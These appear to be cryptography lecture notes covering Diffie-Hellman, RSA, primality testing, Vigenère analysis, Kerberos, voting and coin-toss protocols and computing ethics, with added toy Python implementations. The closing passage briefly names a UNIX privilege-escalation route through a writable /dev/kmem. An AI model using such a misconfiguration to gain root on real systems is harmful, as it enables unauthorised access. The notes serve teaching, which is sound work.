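    for k in range(1, p):
        value = value * g % p
        if value == target:
            return k
    raise ValueError("target is not a power of g modulo p")


def ted_recovers_key(p: int, g: int, alice_pub: int, bob_pub: int) -> int:
    a = ted_discrete_log(g, alice_pub, p)   # recover Alice's secret ...
    return dh_shared(bob_pub, a, p)         # ... then compute what Alice computes


def work_estimate(r: int) -> float:
    """e^(sqrt(r log r)) with c = 1 and log base 10; gives 23 for r = 10 and
    about 1,386,282 for r = 100, matching the table in the notes."""
    return math.exp(math.sqrt(r * math.log10(r)))


if __name__ == "__main__":
    A, B, K = run_exchange(23, 5, 6, 15)
    print(f"Alice sends {A}, Bob sends {B}, shared key {K}")
    print("Ted recovers", ted_recovers_key(23, 5, A, B), "by brute force at this toy size")
    for bits in (10, 100, 1000):
        print(f"{bits:>5} bits: enciphering ~{bits}, discrete log ~{work_estimate(bits):.3g}")
```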
Diffie-Hellman key agreement
By contrast, the enciphering and deciphering process may be done in $O(r)$:
Bit size   Enciphering   Discrete logarithm solution
10         10            23
100        100           1,386,282
1,000      1,000         612,700,000,000,000,000,000,000
Encryption
[Figure: public key encryption. Plaintext $P$ is enciphered with $K_1$ to give $K_1[P]$, and deciphered with $K_2$ to recover $P$; $K_1[K_2[P]] = P$ and also $K_2[K_1[P]] = P$.]
Authentication
[Figure: authentication. $P$ is transformed with $J_2$ and then enciphered with $K_1$, giving $K_1[J_2[P]]$; the receiver applies $K_2$ and then $J_1$ to recover $P$.]
RSA (Rivest, Shamir, Adleman)
This public key system relies on the difficult problem of trying to find the complete factorization of a large composite[9] integer whose prime factors[10] are not known.
[9] An integer larger than 1 is called composite if it has at least one divisor larger than 1 and smaller than itself.
[10] The Fundamental Theorem of Arithmetic states that any integer $N$ (greater than 0) may be expressed uniquely as the product of prime numbers.
RSA hacks
Two RSA-encrypted messages have been cracked:
• The inventors of RSA published a 129-digit (430 bits) RSA public key. In 1994, it was factored with 5000 MIPS-years of computing time.
• A year later, a 384-bit PGP key was cracked. It needed 1300 MIPS-years to factor the key in three months.
Note that these efforts each only cracked a single RSA key.
RSA hacks
If you happen to be able to factor the following number, please tell Hugh - we can split US$200,000[11]!
25195908475657893494027183240048398571429282126204032027777137836043662020707595556264018525880784406918290641249515082189298559149176184502808489120072844992687392807287776735971418347270261896375014971824691165077613379859095700097330459748808428401797429100642458691817195118746121515172654632282216869987549182422433637259085141865462043576798423387184774447920739934236584823824281198163815010674810451660377306056201619676256133844143603833904414952634432190114657544454178424020924616515723350778707749817125772467962926386356373289912154831438167899885040445364023527381951378636564391212010397122822120720357
[11] US$150,000 for me, US$50,000 for you...
RSA coding algorithms
Below are outlined the four processes needed for RSA encryption:
1. Creating a public key
2. Creating a secret key
3. Encrypting messages
4. Decoding messages
To create public key $K_p$
1. Select two different large primes $P$ and $Q$.
2. Assign $x = (P-1)(Q-1)$. (Does this ring a bell?)
3. Choose $E$ relatively prime to $x$. (This must satisfy the condition for $K_s$ given later.)
4. Assign $N = P \cdot Q$.
5. $K_p$ is $N$ concatenated with $E$.
To create private (secret) key $K_s$
1. Choose $D$ such that $D \cdot E \bmod x = 1$.
(a) i.e. $D$ and $E$ are multiplicative inverses modulo $x$
(b) another way: $DE = k(P-1)(Q-1) + 1$ for some integer $k$
2. $K_s$ is $N$ concatenated with $D$.
To encode plain text m
1. Pretend m is a number.
2. Calculate $c = m^E \bmod N$.
To decode c back to m
1. Calculate $m = c^D \bmod N$.
2. ....WHY?....
...Why?...
$c^D \bmod N = m^{ED} \bmod N$
$= m^{k(P-1)(Q-1)+1} \bmod PQ$
$= m \cdot m^{k(P-1)(Q-1)} \bmod PQ$
• $m^{P-1} \bmod P = 1$ (Fermat's little theorem), so $(m^{(P-1)})^{k(Q-1)} \bmod P = 1$
• $m^{Q-1} \bmod Q = 1$, and so (tutorial) $(m^{(P-1)})^{k(Q-1)} \bmod PQ = 1$.
Hence $c^D \bmod N = m^{ED} \bmod N = m$.
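The four RSA processes and the "Why?" argument above, carried out in code as an added example (not from the notes). The primes 61, 53 and the exponent 17 are toy values; 1000003 and 999983 are small primes chosen by me so that a four-character message fits below $N$.

```python
from math import gcd


def make_keys(P: int, Q: int, E: int):
    """Steps from the notes: x = (P-1)(Q-1); E relatively prime to x; N = PQ;
    D*E mod x = 1. Returns (Kp, Ks) with Kp = (N, E) and Ks = (N, D)."""
    if P == Q:
        raise ValueError("P and Q must be two different primes")
    x = (P - 1) * (Q - 1)
    if gcd(E, x) != 1:
        raise ValueError("E must be relatively prime to (P-1)(Q-1)")
    N = P * Q
    D = pow(E, -1, x)           # multiplicative inverse of E modulo x (Python 3.8+)
    return (N, E), (N, D)


def encode(m: int, Kp) -> int:
    N, E = Kp
    if not 0 <= m < N:
        raise ValueError("the 'number' m must be smaller than N")
    return pow(m, E, N)         # c = m^E mod N


def decode(c: int, Ks) -> int:
    N, D = Ks
    return pow(c, D, N)         # m = c^D mod N


def text_to_number(s: str) -> int:
    """'Pretend m is a number': read the UTF-8 bytes as one big-endian integer."""
    return int.from_bytes(s.encode(), "big")


def number_to_text(m: int) -> str:
    return m.to_bytes((m.bit_length() + 7) // 8, "big").decode()


def why_it_works(m: int, P: int, Q: int, E: int, D: int) -> bool:
    """Check each line of the '...Why?...' slide numerically, for one m with gcd(m, PQ) = 1."""
    x = (P - 1) * (Q - 1)
    k, rem = divmod(E * D - 1, x)       # DE = k(P-1)(Q-1) + 1
    assert rem == 0
    assert pow(m, P - 1, P) == 1        # Fermat: m^{P-1} mod P = 1
    assert pow(m, Q - 1, Q) == 1        # and m^{Q-1} mod Q = 1
    assert pow(m, k * x, P * Q) == 1    # hence (m^{P-1})^{k(Q-1)} mod PQ = 1
    return pow(m, E * D, P * Q) == m    # so c^D = m^{ED} = m * 1 mod N


if __name__ == "__main__":
    Kp, Ks = make_keys(61, 53, 17)      # toy primes; real keys use hundreds of digits
    c = encode(65, Kp)
    print("Kp =", Kp, "Ks =", Ks, "c =", c, "decoded m =", decode(c, Ks))
    print("why it works:", why_it_works(65, 61, 53, Kp[1], Ks[1]))
    Kp, Ks = make_keys(1000003, 999983, 65537)   # just large enough for four characters
    print(number_to_text(decode(encode(text_to_number("RSA!"), Kp), Ks)))
```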
RSA code
    #!/usr/bin/perl -sp0777i<X+d*lMLa^*lN%0]dsXx++lMlN/dsM0<j]dsj
    $/=unpack('H*',$_);$_=`echo 16dio\U$k"SK$/SM$n\EsN0p[lN*1lK[d2%Sa2/d0$^Ixp"|dc`;s/\W//g;$_=pack('H*',/((..)*)$/)
and then
• echo "squeamish ossifrage" | ./rsa.perl -k=10001 -n=1967cb529 > msg.rsa
• ./rsa.perl -d -k=ac363601 -n=1967cb529 < msg.rsa
Testing large numbers for primality
RSA requires us to generate large prime numbers, but there is no algorithm for constructing arbitrarily large prime numbers. Instead we use statistical testing methods to determine primality.
Quiz! Is 162,259,276,829,213,363,391,578,010,288,127 prime[12]?
After choosing a large random (odd) number $p$, we can quickly see if $p$ is divisible by 2, 3 and so on (say all primes up to 1000). If our number $p$ passes this, then we can perform some sort of statistical primality test.
[12] Note that this is only a 33 digit number, and we typically use prime numbers with hundreds of digits.
Lehmann test
1. Choose a random number $w$ (for witness) less than $p$
2. If $w^{(p-1)/2} \not\equiv \pm 1 \pmod p$ then $p$ is not prime
3. If $w^{(p-1)/2} \equiv \pm 1 \pmod p$ then the likelihood is less than 0.5 that $p$ is not prime
Repeat the test over and over, say $n$ times. The likelihood of a false positive will be less than $1/2^n$. Other tests, such as the Rabin-Miller test, may converge more quickly.
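The procedure of the last two slides (trial division by the primes up to 1000, then repeated Lehmann rounds) as an added example, not from the notes. The quiz number is $2^{107} - 1$, a known Mersenne prime, so the test should accept it; the seed parameter is mine, so that a run is reproducible.

```python
import random


def small_primes(limit: int = 1000) -> list:
    """Sieve of Eratosthenes: all primes up to and including limit."""
    sieve = bytearray([1]) * (limit + 1)
    sieve[0] = sieve[1] = 0
    for i in range(2, int(limit ** 0.5) + 1):
        if sieve[i]:
            sieve[i * i::i] = bytearray(len(sieve[i * i::i]))
    return [i for i, is_p in enumerate(sieve) if is_p]


SMALL_PRIMES = small_primes(1000)


def trial_division(p: int):
    """True/False when a small prime settles the question, None when undecided."""
    for q in SMALL_PRIMES:
        if p == q:
            return True
        if p % q == 0:
            return False
    return None


def lehmann_round(p: int, w: int) -> bool:
    """One round: does w^((p-1)/2) equal +1 or -1 modulo p?
    For a prime p this always holds (Euler's criterion); for a composite p it
    holds for at most half of the witnesses w."""
    r = pow(w, (p - 1) // 2, p)
    return r == 1 or r == p - 1


def is_probable_prime(p: int, rounds: int = 20, seed=None) -> bool:
    """False positive probability below 1/2^rounds for a composite p."""
    if p < 2:
        return False
    decided = trial_division(p)
    if decided is not None:
        return decided
    rng = random.Random(seed)
    for _ in range(rounds):
        w = rng.randrange(2, p - 1)         # witness 1 < w < p - 1
        if not lehmann_round(p, w):
            return False                    # a single failing witness is conclusive
    return True


QUIZ_NUMBER = 162259276829213363391578010288127   # the 33-digit number on the slide

if __name__ == "__main__":
    print("quiz number prime?", is_probable_prime(QUIZ_NUMBER, seed=1))
    print("561 prime?", is_probable_prime(561, seed=1))                      # 3 * 11 * 17
    print("1000003 * 999983 prime?", is_probable_prime(1000003 * 999983, seed=7))
```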
Primes is in P!
A group at the Indian Institute of Technology has discovered the unexpected result that testing a number for primality can be done in polynomial time, rather than using probabilistic tests as just shown.
This is unlikely to affect the effectiveness of public key systems.
The paper is only 7 pages long and is beautifully written...
Case study: PGP
PGP (Pretty Good Privacy) is a public key encryption package to protect E-mail and data files.
It lets you communicate securely with people you've never met, with no secure channels needed for prior exchange of keys.
PGP can be used to append digital signatures to messages, as well as encrypt the messages, or do both.
Case study: PGP
It uses various schemes including patented ones like IDEA and RSA.
The patent on IDEA allows non-commercial distribution, and the RSA patent has expired.
However there are also commercial versions of PGP.
PGP can use, for example, 2048 bit primes, and it is considered unlikely that PGP with this level of encryption can be broken.
Chapter 8
Lecture 8 - Protocols
Mid semester Test
9th October 2003
LT27, 14:30
MCQ, closed book
Covers everything up to and including today...
Last session
• Finish on error correction
• Encryption
– Symmetric keys
∗ DES
– Public keys
∗ RSA
This session
• Kerberos
• Voting
• Contract signing
Summary
Substitution, Vigenère, index of coincidence
DES, Feistel, modes of operation
Public key, Diffie Hellman, RSA
Vigenère
If our keyword was BAD, then encoding HAD A FEED would result in
Key    B A D B A D B A
Text   H A D A F E E D
Cipher I A G B F H F D
If we can discover the length of the repeated key (in this case 3), and the text is long enough, we can just consider the cipher text to be a group of interleaved monoalphabetic substitution ciphers and solve accordingly.
Analysis
The index of coincidence is the probability that two randomly chosen letters from the cipher will be the same, and it can help us discover the length of a key:
$$IC = \frac{1}{N(N-1)} \sum_{i=0}^{25} F_i (F_i - 1)$$
where $F_i$ is the frequency of the occurrences of symbol $i$ and $N$ is the length of the cipher.
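The Vigenère table and the index of coincidence of the two slides above, as an added example (not from the notes): the cipher, the IC formula, and the key-length search that splits the cipher text into interleaved columns and looks for the period at which each column behaves like a monoalphabetic cipher. The sample plaintext is ordinary English I constructed for the demonstration.

```python
from collections import Counter

ALPHABET = "ABCDEFGHIJKLMNOPQRSTUVWXYZ"


def letters_only(text: str) -> str:
    """Keep A-Z only, as the slide's 'HAD A FEED' -> 'HADAFEED' does."""
    return "".join(ch for ch in text.upper() if ch in ALPHABET)


def vigenere(text: str, key: str, decrypt: bool = False) -> str:
    """Shift each letter by the matching key letter (A = 0, B = 1, ...), key repeating."""
    text, key = letters_only(text), letters_only(key)
    out = []
    for i, ch in enumerate(text):
        shift = ord(key[i % len(key)]) - ord("A")
        if decrypt:
            shift = -shift
        out.append(ALPHABET[(ord(ch) - ord("A") + shift) % 26])
    return "".join(out)


def index_of_coincidence(text: str) -> float:
    """IC = sum F_i (F_i - 1) / (N (N - 1)); about 0.066 for English, 0.038 for random letters."""
    n = len(text)
    if n < 2:
        return 0.0
    return sum(f * (f - 1) for f in Counter(text).values()) / (n * (n - 1))


def average_column_ic(cipher: str, period: int) -> float:
    """Split the cipher into `period` interleaved columns and average their ICs."""
    cols = [cipher[i::period] for i in range(period)]
    return sum(index_of_coincidence(c) for c in cols) / period


def guess_key_length(cipher: str, max_len: int = 10) -> int:
    """Smallest period whose columns look monoalphabetic. Multiples of the true
    length score high too, so accept the first length within 20% of the best."""
    scores = {L: average_column_ic(cipher, L) for L in range(1, max_len + 1)}
    best = max(scores.values())
    return min(L for L, s in scores.items() if s >= 0.8 * best)


# Constructed sample plaintext (ordinary English, not from the notes).
PLAINTEXT = (
    "The index of coincidence measures how likely two letters drawn at random "
    "from a text are to be the same. Ordinary English is far from uniform: the "
    "letter E alone accounts for roughly an eighth of all letters while Q and Z "
    "are rare. A simple substitution cipher merely relabels the symbols, so the "
    "skew in the counts survives and the index stays high. A polyalphabetic "
    "cipher spreads each plaintext letter across several alphabets and flattens "
    "the counts, pulling the index down towards the value expected for random "
    "text. If the key repeats, however, the letters enciphered under the same "
    "key letter form a hidden substitution cipher of their own, and splitting "
    "the ciphertext into columns by the right period restores the familiar skew "
    "in every column. That is how the index exposes the length of the key "
    "without revealing a single letter of it."
)

if __name__ == "__main__":
    print(vigenere("HAD A FEED", "BAD"))            # the slide's example: IAGBFHFD
    ct = vigenere(PLAINTEXT, "BAD")
    print("IC plaintext %.4f  IC cipher %.4f" % (index_of_coincidence(letters_only(PLAINTEXT)),
                                                  index_of_coincidence(ct)))
    for L in range(1, 8):
        print(L, "%.4f" % average_column_ic(ct, L))
    print("guessed key length:", guess_key_length(ct))
```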
DES - Feistel
[Figure: a three-round Feistel network. Encryption takes $(l_0, r_0)$ through $(l_1, r_1)$ and $(l_2, r_2)$ to $(l_3, r_3)$, each round XORing ($+$) the output of $f$, keyed with $K_0$, $K_1$, $K_2$ in turn, into one half; decryption uses the same structure with the round keys in the reverse order $K_2$, $K_1$, $K_0$.]
Each of the 16 stages (rounds) of DES uses a Feistel structure which encrypts a 64 bit value into another 64 bit value using a 48 bit key derived from the original 56 bit key.
DES modes of operation
[Figure: DES modes of operation. Electronic Code Book: each msg block is enciphered with DES independently to give its Ctext block. Cipher Block Chaining: each msg block is combined with the previous Ctext block (an Initial vector for the first block) before being enciphered with DES.]
Public key systems
Public key cryptography relies on the use of enciphering functions which are not realistically invertible unless you have a deciphering key.
[Figure: public key encryption. Plaintext $P$ is enciphered with $K_1$ to give $K_1[P]$, and deciphered with $K_2$ to recover $P$; $K_1[K_2[P]] = P$ and also $K_2[K_1[P]] = P$.]
Authentication
[Figure: authentication. $P$ is transformed with $J_2$ and then enciphered with $K_1$, giving $K_1[J_2[P]]$; the receiver applies $K_2$ and then $J_1$ to recover $P$.]
Diffie-Hellman key agreement
Two separated users create and share a secret key. A third party is not realistically able to calculate the shared key.
[Figure: Alice (who knows $p$, $g$ and $a$) sends $g^a \bmod p$ to Bob; Bob (who knows $p$, $g$ and $b$) sends $g^b \bmod p$ to Alice; Ted, listening in between, sees $p$, $g$, $g^a \bmod p$ and $g^b \bmod p$.]
RSA coding algorithms
The four processes needed for RSA encryption:
1. Creating a public key
2. Creating a secret key
3. Encrypting messages
4. Decoding messages
Uses of encryption
1. Generating encrypted passwords with 1-way functions
2. Checking integrity by appending digital signature
3. Checking the authenticity of a message.
4. Encrypting timestamps with messages to prevent replay attacks.
5. Exchanging a key.
Protocols
Systems in which the protocol plays a large part:
1. Kerberos protocol for distributing keys
2. Voting protocols
3. Contract signing protocols
These three protocols are by no means the only ones.
Other examples
Key distribution
Clipper
Oblivious transfer, in which two parties can complete a joint computation, without either party revealing any unnecessary data.
Kerberos/Cerberus
Kerberos
Network authentication protocol.
Strong authentication for client/server applications using public key cryptography.
Kerberos is freely available in source form
Kerberos is also available in commercial products.
Client can prove its identity to a server (and vice versa) across an insecure network connection.
Kerberos
After a client and server have used Kerberos to prove their identity, they can also encrypt all of their communications to assure privacy and data integrity as they go about their business.
Must have a Key Distribution Center (KDC)
Kerberos uses Needham-Schroeder protocol.
Kerberos
[Figure: the Client exchanges messages (1) and (2) with the KDC's Authentication service and messages (3) and (4) with its Ticket granting service, then messages (5) and (6) with the Server.]
Kerberos
When a client first authenticates to Kerberos, she:
1. Talks to KDC, to get a Ticket Granting Ticket
2. Uses that to talk to the Ticket Granting Service
3. Uses the ticket, to interact with the server.
This way a user doesn't have to reenter passwords every time they wish to connect to a Kerberized service. If the Ticket Granting Ticket is compromised, an attacker can only masquerade as a user until the ticket expires.
Kerberos protocol
Two sorts of credentials: tickets and authenticators.
A ticket $T_{c,s}$ contains the client's name and network address, the server's name, a timestamp and a session key. This is encrypted with the server's secret key (so that the client is unable to modify it).
An authenticator $A_{c,s}$ contains the client's name, a timestamp and an optional extra session key. This is encrypted with the session key shared between the client and the server.
Kerberos protocol
A key $K_{x,y}$ is a session key shared by both $x$ and $y$.
When we encrypt a message $M$ using the key $K_{x,y}$ we write it as $\{M\}_{K_{x,y}}$.
Kerberos protocol
Alice wants session key for communication with Bob:
• Alice sends a message to Ted containing her identity, Ted's TGS identity, and a one-time value ($n$): $a, tgs, n$.
• Ted responds with a key encrypted with Alice's secret key (which Ted knows), and a ticket encrypted with the TGS secret key: $\{K_{a,tgs}, n\}_{K_a}$, $\{T_{a,tgs}\}_{K_{tgs}}$. Alice now has the ticket and session key: $\{T_{a,tgs}\}_{K_{tgs}}$, $K_{a,tgs}$.
• Alice can prove her identity to the TGS, as she has the session key $K_{a,tgs}$ and the Ticket Granting Ticket $\{T_{a,tgs}\}_{K_{tgs}}$.
Kerberos protocol
Later, Alice can ask the TGS for a specific service ticket:
• When Alice wants a ticket for a specific service (say with Bob), she sends an authenticator along with the Ticket Granting Ticket to the TGS: $\{A_{a,b}\}_{K_{a,tgs}}$, $\{T_{a,tgs}\}_{K_{tgs}}$, $b$, $n$.
• The TGS responds with a suitable key and a ticket: $\{K_{a,b}, n\}_{K_{a,tgs}}$, $\{T_{a,b}\}_{K_b}$.
• Alice can now use an authenticator and ticket directly with Bob: $\{A_{a,b}\}_{K_{a,b}}$, $\{T_{a,b}\}_{K_b}$.
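The three exchanges of the last two slides run end to end, as an added example that is not part of the notes. The cipher behind seal/unseal is a stand-in I constructed (SHA-256 keystream plus HMAC tag) for the symmetric encryption Kerberos uses; Ted's KDC holds the secret keys $K_a$, $K_{tgs}$ and $K_b$, and the address field stands for the client's network address in the ticket.

```python
import hashlib, hmac, json, os, time


def _keystream(key: bytes, nonce: bytes, n: int) -> bytes:
    out, ctr = b"", 0
    while len(out) < n:
        out += hashlib.sha256(key + nonce + ctr.to_bytes(4, "big")).digest()
        ctr += 1
    return out[:n]


def seal(key: bytes, msg: dict) -> bytes:
    """{msg}_key: JSON XORed with a SHA-256 keystream, then an HMAC tag (encrypt-then-MAC).
    A constructed stand-in for the symmetric cipher (DES originally) that Kerberos uses."""
    pt = json.dumps(msg, sort_keys=True).encode()
    nonce = os.urandom(16)
    ct = bytes(a ^ b for a, b in zip(pt, _keystream(key, nonce, len(pt))))
    return nonce + ct + hmac.new(key, nonce + ct, hashlib.sha256).digest()


def unseal(key: bytes, blob: bytes) -> dict:
    nonce, ct, tag = blob[:16], blob[16:-32], blob[-32:]
    if not hmac.compare_digest(hmac.new(key, nonce + ct, hashlib.sha256).digest(), tag):
        raise ValueError("wrong key or tampered message")
    return json.loads(bytes(a ^ b for a, b in zip(ct, _keystream(key, nonce, len(ct)))))


def fresh_key() -> str:
    return os.urandom(16).hex()      # session keys travel inside JSON, so keep them as hex


def ticket(client: str, addr: str, server: str, session_key: str) -> dict:
    """T_{c,s}: client name and address, server name, timestamp, session key."""
    return {"client": client, "addr": addr, "server": server, "time": time.time(), "key": session_key}


def authenticator(client: str) -> dict:
    """A_{c,s}: client name and a timestamp (the optional extra key is omitted here)."""
    return {"client": client, "time": time.time()}


class KDC:
    """Ted: knows every principal's secret key; runs the authentication service and the TGS."""
    def __init__(self, keys: dict):
        self.keys = keys             # {"alice": K_a, "tgs": K_tgs, "bob": K_b}

    def authenticate(self, a: str, tgs: str, n: str, addr: str):
        """(1) a, tgs, n  ->  (2) {K_a,tgs, n}_K_a, {T_a,tgs}_K_tgs"""
        k_a_tgs = fresh_key()
        return (seal(self.keys[a], {"key": k_a_tgs, "n": n}),
                seal(self.keys[tgs], ticket(a, addr, tgs, k_a_tgs)))

    def grant(self, auth_blob: bytes, tgt_blob: bytes, b: str, n: str, addr: str):
        """(3) {A}_K_a,tgs, {T_a,tgs}_K_tgs, b, n  ->  (4) {K_a,b, n}_K_a,tgs, {T_a,b}_K_b"""
        tgt = unseal(self.keys["tgs"], tgt_blob)        # only K_tgs opens the TGT
        k_a_tgs = bytes.fromhex(tgt["key"])
        auth = unseal(k_a_tgs, auth_blob)               # proves the sender holds K_a,tgs
        if auth["client"] != tgt["client"] or tgt["addr"] != addr:
            raise PermissionError("authenticator does not match ticket")
        k_a_b = fresh_key()
        return (seal(k_a_tgs, {"key": k_a_b, "n": n}),
                seal(self.keys[b], ticket(tgt["client"], addr, b, k_a_b)))


def server_accept(own_key: bytes, auth_blob: bytes, ticket_blob: bytes, addr: str,
                  max_skew: float = 300.0) -> str:
    """(5) {A_a,b}_K_a,b, {T_a,b}_K_b arriving at Bob: returns K_a,b if everything is consistent."""
    t = unseal(own_key, ticket_blob)
    auth = unseal(bytes.fromhex(t["key"]), auth_blob)
    if auth["client"] != t["client"] or t["addr"] != addr or abs(time.time() - auth["time"]) > max_skew:
        raise PermissionError("ticket/authenticator mismatch or stale authenticator")
    return t["key"]


def run_protocol(tamper_ticket: bool = False) -> str:
    """Alice obtains a TGT, then a ticket for Bob, then talks to Bob. All keys are constructed."""
    keys = {"alice": os.urandom(16), "tgs": os.urandom(16), "bob": os.urandom(16)}
    ted, addr = KDC(keys), "10.0.0.5"
    n1 = os.urandom(4).hex()
    reply, tgt = ted.authenticate("alice", "tgs", n1, addr)
    got = unseal(keys["alice"], reply)                   # Alice opens it with her own K_a
    if got["n"] != n1:
        return "replayed reply"
    k_a_tgs = bytes.fromhex(got["key"])
    n2 = os.urandom(4).hex()
    reply, t_ab = ted.grant(seal(k_a_tgs, authenticator("alice")), tgt, "bob", n2, addr)
    got = unseal(k_a_tgs, reply)
    if got["n"] != n2:
        return "replayed reply"
    k_ab = got["key"]
    if tamper_ticket:   # Alice cannot edit her service ticket: it is sealed under Bob's key
        t_ab = t_ab[:20] + bytes([t_ab[20] ^ 0x01]) + t_ab[21:]
    try:
        bobs_key = server_accept(keys["bob"], seal(bytes.fromhex(k_ab), authenticator("alice")), t_ab, addr)
    except ValueError:
        return "rejected"
    return "ok" if bobs_key == k_ab else "key mismatch"


if __name__ == "__main__":
    print(run_protocol(), run_protocol(tamper_ticket=True))
```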
Weaknesses
Host security: Kerberos makes no provisions for host security; it assumes that it is running on trusted hosts with an untrusted network.
KDC compromises: Kerberos uses a principal's password (encryption key) as the fundamental proof of identity.
Salt: This is an additional input to the one-way hash algorithm.
Voting protocols
A voting protocol is one in which
• independent systems vote in a kind of election, and
• afterwards we can check that the vote was correct.
• Each voter is only allowed a single vote, and
• the system should be corruption-proof.
Voting protocols
Example with Alice, Bob and Charles (!), who vote and then encrypt and sign a series of messages using public-key encryption. For example, if Alice votes $v_A$, then she will broadcast to all other voters the message
$R_A(R_B(R_C(E_A(E_B(E_C(v_A))))))$
where $R_A$ is a random encoding function which adds a random string to a message before encrypting it with A's public key, and $E_A$ is public key encryption with A's public key.
Voting protocols
Each voter then signs the message and decrypts one level of the encryption.
At the end of the protocol, each voter has a complete signed audit trail and is ensured of the validity of the vote.
Tossing a coin
Alice and Bob want to toss a coin
Alice calculates two primes $p$, $q$, calculates $N = pq$, and sends $N$ to Bob. $N = 35 = 5 \cdot 7$.
If Bob can factorize the number, then Bob wins a coin toss.
Bob selects random $x$, and sends $x^2 \bmod N = y$ to Alice. $y = 31^2 \bmod 35 = 16$.
Tossing a coin
Alice calculates the four square roots of 16:
• $4^2 \bmod 35 = 16$
• $31^2 \bmod 35 = 16$
• $24^2 \bmod 35 = 16$
• $11^2 \bmod 35 = 16$
This is easy for Alice, as she knows the prime factors of $N$. She then sends one of these back to Bob.
Tossing a coin
If Bob receives $x$ or $-x$, then he learns nothing, but
if Bob receives either of the other values, he can add this to $x$, and then find the GCD of the result with $N$:
$\gcd(24 + 31, 35) = \gcd(55, 35) = 5$
Alice is unable to tell she has divulged the factor.
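The coin toss of the last three slides as an added example (not from the notes): Alice's root-finding with the factors, Bob's gcd test, and a simulation showing Bob wins half the time. The primes 1019 and 1031 used for the simulation are small values I chose, both $\equiv 3 \pmod 4$ so that the closed-form square root applies.

```python
import random
from itertools import product
from math import gcd


def sqrt_mod_prime(y: int, p: int) -> list:
    """All square roots of y modulo the prime p (none, one or two of them)."""
    y %= p
    if y == 0:
        return [0]
    if p % 4 == 3:                               # closed form when p = 3 (mod 4)
        r = pow(y, (p + 1) // 4, p)
        return sorted({r, p - r}) if r * r % p == y else []
    # toy-sized fallback for p = 1 (mod 4); a real implementation would use Tonelli-Shanks
    return sorted(r for r in range(p) if r * r % p == y)


def crt(r_p: int, p: int, r_q: int, q: int) -> int:
    """The x in [0, pq) with x = r_p (mod p) and x = r_q (mod q)."""
    return (r_p * q * pow(q, -1, p) + r_q * p * pow(p, -1, q)) % (p * q)


def alice_roots(y: int, p: int, q: int) -> list:
    """Alice knows N = pq, so she takes roots mod p and mod q separately and combines them."""
    return sorted({crt(a, p, b, q) for a, b in product(sqrt_mod_prime(y, p), sqrt_mod_prime(y, q))})


def bob_learns(x: int, r: int, N: int):
    """Bob's check on Alice's reply r: gcd(x + r, N) is a proper factor unless r = +-x."""
    g = gcd(x + r, N)
    return g if 1 < g < N else None


def coin_toss(p: int, q: int, rng: random.Random) -> bool:
    """One round: Bob wins if he ends up holding a factor of N."""
    N = p * q
    x = rng.randrange(2, N)
    while gcd(x, N) != 1:              # such an x would hand Bob a factor before the toss
        x = rng.randrange(2, N)
    y = x * x % N
    r = rng.choice(alice_roots(y, p, q))   # Alice cannot tell which root is Bob's x
    return bob_learns(x, r, N) is not None


def win_rate(p: int, q: int, trials: int, seed: int) -> float:
    rng = random.Random(seed)
    return sum(coin_toss(p, q, rng) for _ in range(trials)) / trials


if __name__ == "__main__":
    print(alice_roots(16, 5, 7))           # the slide's four roots of 16 mod 35
    for r in alice_roots(16, 5, 7):
        print(f"Alice sends {r}: Bob learns {bob_learns(31, r, 35)}")
    print("Bob's win rate over 2000 tosses:", win_rate(1019, 1031, 2000, seed=1))
```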
Oblivious transfer
In an oblivious transfer, randomness is used to convince participants of the fairness of some transaction.
In a coin-tossing example, Alice knows the prime factors of a large number, and if Bob can factorize the number, then Bob wins a coin toss.
A protocol allows Alice to either divulge one of the prime factors to Bob, or not, with equal probability.
Alice is unable to tell if she has divulged the factor, and so the coin toss is fair.
Contract signing
Signing contracts can be difficult.
If one party signs the contract, the other may not. We have one party bound by the contract, and the other not.
In addition, both may sign, and then one may say “I didn't sign any contract!” afterwards.
Contract signing
Oblivious transfer used for contract-signing where
• Up to a certain point neither party is bound
• After that point both parties are bound
• Either party can prove that the other party signed
Alice and Bob exchange signed messages, agreeing to be bound by a contract with ever-increasing probability.
Contract signing
In the event of early termination of the contract, either party can take the messages they have to an adjudicator, who chooses a random probability value (42% say) before looking at the messages.
If both messages are over 42% then both parties are bound.
If less, then both parties are free.
Chapter 9
Lecture 9 - System (in)security
Administration
Results are out - please check.
Assignment 1
hardcopy to tutor or me, email softcopy to me.
Assignment 2 ... better get going.
Last session
• Kerberos
• Voting
• Contract signing
This session
• Ethics and computing
• Organizations and standards
• UNIX passwords
• NT passwords
Stranger danger...
One of my sons was taught stranger-danger at his school. We were asked to quiz him afterwards, so we asked him if he should accept a lift in a car with a stranger. He immediately replied “No way!”. We then asked: “What if he offered you sweets?”, but he still replied “No way!”. Finally we asked: “Why not?”, to which he replied “Because you might not get any!”
Ethics
Moral development stages:
Stage 1: Obedience and punishment
...
Stage 6: Individual principles of conscience - an orientation not only toward existing social rules, but also toward the conscience as a directing agent, mutual trust and respect, and principles of moral choice involving logical universalities and consistency. If one acts otherwise, self-condemnation and guilt result.
Ethics
It is my expectation, and requirement, that you are able to maturely evaluate rights and wrongs.
In these sections of the course, I will be outlining systems which demonstrate poor cryptographic techniques, and as a result, can be defeated.
A more cynical view might be that I am teaching hacking
...this is not my intent...
Ethics and computing
No new ethical dilemmas... Perhaps the only significant difference is that the computer crimes are so easy.
Software duplication: = theft.
Using information: = insider trading.
E-mail abuse: = abuse.
Network administrator’s dilemma
Network administrators often come to learn things about their 'clients'.
Without asking the client, they should not make use of that information.
The network administrator's dilemma: How to control bad-guys without trampling over rights.
Professional codes of ethics
Most professional bodies[13] have formal written codes of ethics
The computer industry has yet to develop a standard code of conduct
If computer crime continues to rise, codes may be imposed on it.
[13] For example: Medical boards.
ACS code of ethics
1. I will serve the interests of my clients and employers, my employees and students, and the community generally, as matters of no less priority than the interests of myself or my colleagues....
Within a general framework of ethical and moral responsibility, codes such as this one can help clarify grey areas of concern.
Insecurity - threats are real
For example:
• Pentagon machines were repeatedly corrupted by unknown intruders during the Gulf war. The intruders appeared to be doing it as part of a contest.
• German hackers demonstrated on TV a method of transferring money into their own accounts using ActiveX controls downloaded to an unsuspecting person's machine.
• Estimates of computer theft in the US range from US$1 to 30 billion/year - most of which goes unreported.
Taxonomy of insecurity?
Each new attack adds new levels to the structure:
• physical insecurity, and
• password insecurity
Some of the security of modern systems is provided through cryptographic techniques (particularly password storage), the subject today.
Non-cryptographic cracking
Misconfiguration: If excessive permissions exist on certain directories and files, these can lead to gaining higher levels of access. For example, on a UNIX system, if /dev/kmem is writable it is possible to rewrite your UID to match root's.
